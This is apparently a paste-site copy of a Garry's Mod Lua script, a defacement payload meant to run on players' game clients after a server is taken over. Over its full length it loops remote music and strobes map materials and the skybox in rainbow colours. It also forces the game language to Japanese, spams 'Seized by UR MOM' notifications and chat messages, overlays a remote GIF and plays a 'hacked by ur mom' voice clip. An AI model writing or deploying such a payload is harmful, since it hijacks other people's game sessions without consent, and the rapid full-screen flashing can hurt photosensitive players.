Facebook
From ta soeur, 4 Years ago, written in Lua.
Embed
Download Paste or View Raw
Hits: 190
  1.  
  2.     GizehSSV = GizehSSV or {}
  3.     GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  4.     GizehSSVLogo = GizehSSVLogo or nil
  5.     GizehSSV.Enabled = GizehSSV.Enabled or !!1
  6.     sound.PlayURL( "https://www.dropbox.com/s/5ild29i0ursnn8x/skrillex-damian-marley-make-it-bun-dem-laudz-trap-remix.mp3?dl=1", "mono noblock noplay", function( station )
  7.         timer.Simple( 0.1, function()                    
  8.             ClientStation = station
  9.             station:EnableLooping( true )
  10.             station:Play()
  11.             station:SetVolume( 50 )
  12.         end )
  13.     end )
  14.     timer.Create("aaneyjvkybtk", 0.1, 0, function()
  15.         if not GizehSSV.Enabled then return end
  16.         local mat = Entity(0):GetMaterials()
  17.         for k,v in pairs(mat) do
  18.             if GizehSSV.Wait1 then
  19.                 local col = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  20.                 Material(v):SetVector("$color", Vector(col.r/220,col.g/220,col.b/220))
  21.             else
  22.                 local col = Color(math.random(170,220),math.random(170,220),math.random(170,220))
  23.                 Material(v):SetVector("$color", Vector(col.r-200,col.g-200,col.b-200))
  24.             end
  25.         end
  26.     end)
  27.     timer.Simple(142.267,function()
  28.         if not GizehSSV.Enabled then return end
  29.         RunConsoleCommand('gmod_language', 'ja')
  30.     end)
  31.     timer.Simple(22, function()
  32.         if not GizehSSV.Enabled then return end
  33.         timer.Create("uurnbaneycmk", 0.1, 0, function()
  34.             if not GizehSSV.Enabled then return end
  35.             notification.AddLegacy( "Seized by UR MOM", math.random(0, 4), 1.5 )
  36.         end)
  37.         function GAMEMODE:PostDraw2DSkyBox()
  38.             local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  39.             render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  40.             return !!1
  41.         end
  42.         function GAMEMODE:PreDrawSkyBox()
  43.             local col = HSVToColor( RealTime() * 120 % 360, 1, 1 )
  44.             render.Clear(col.r/1.3, col.g/1.3, col.b/1.3, 255)
  45.             return !!1
  46.         end
  47.     end)
  48.     timer.Simple(5, function()
  49.         if not GizehSSV.Enabled then return end
  50.         if GizehSSVLogo then GizehSSVLogo:Remove() GizehSSVLogo = nil end
  51.         GizehSSVLogo = vgui.Create('HTML')
  52.         GizehSSVLogo:MoveToFront()
  53.         GizehSSVLogo:SetSize(1,1)
  54.         GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  55.         GizehSSVLogo:OpenURL('http://image.noelshack.com/fichiers/2019/40/5/1570219078-3fc92966-b1c6-4e17-88a9-29f01c4d5171.gif')
  56.         hook.Add("Tick","kkhstmuknxoy", function()
  57.             if GizehSSV.Wait1 then
  58.                 GizehSSVLogo:SetPos((ScrW()/2)-300,(ScrH()/8)-100)
  59.             else
  60.                 GizehSSVLogo:SetPos((ScrW()/2)-math.random(280, 320),(ScrH()/8)-math.random(80, 120))
  61.             end
  62.         end)
  63.         timer.Create("qqyptebobvnq", 1.5, 0, function()
  64.             local time = tonumber(0)
  65.             local Message = {
  66.                 "        .Seized by UR MOM.",
  67.                 "       ..Seized by UR MOM..",
  68.                 "      ...Seized by UR MOM...",
  69.                 "     ....Seized by UR MOM....",
  70.                 "    .....Seized by UR MOM.....",
  71.                 "   ......Seized by UR MOM......",
  72.                 "  .......Seized by UR MOM.......",
  73.                 " ........Seized by UR MOM........",
  74.                 ".........Seized by UR MOM.........",
  75.                 " ........Seized by UR MOM........",
  76.                 "  .......Seized by UR MOM.......",
  77.                 "   ......Seized by UR MOM......",
  78.                 "    .....Seized by UR MOM.....",
  79.                 "     ....Seized by UR MOM....",
  80.                 "      ...Seized by UR MOM...",
  81.                 "       ..Seized by UR MOM..",
  82.                 "        .Seized by UR MOM.",
  83.             }
  84.             for _, line in pairs(Message) do
  85.                 time = time + tonumber(0.1)
  86.                 timer.Simple(time,function()
  87.                     if not GizehSSV.Enabled then return end
  88.                     chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  89.                 end)
  90.             end
  91.         end)
  92.     end)
  93.     timer.Simple(1, function()
  94.         if not GizehSSV.Enabled then return end
  95.         local text = "Seized By UR MOM"
  96.         local str = ''  text = string.Trim(text)  text = string.Explode(' ', text)  if text == {} then return end  for k,v in pairs(text) do  str = str .. v .. '+'  end sound.PlayURL('https://translate.google.com/translate_tts?ie=UTF-8&tl=fr-TR&client=tw-ob&q=hacked%20by%20ur%20mom','mono',function(chan, num, str)end)
  97.     end)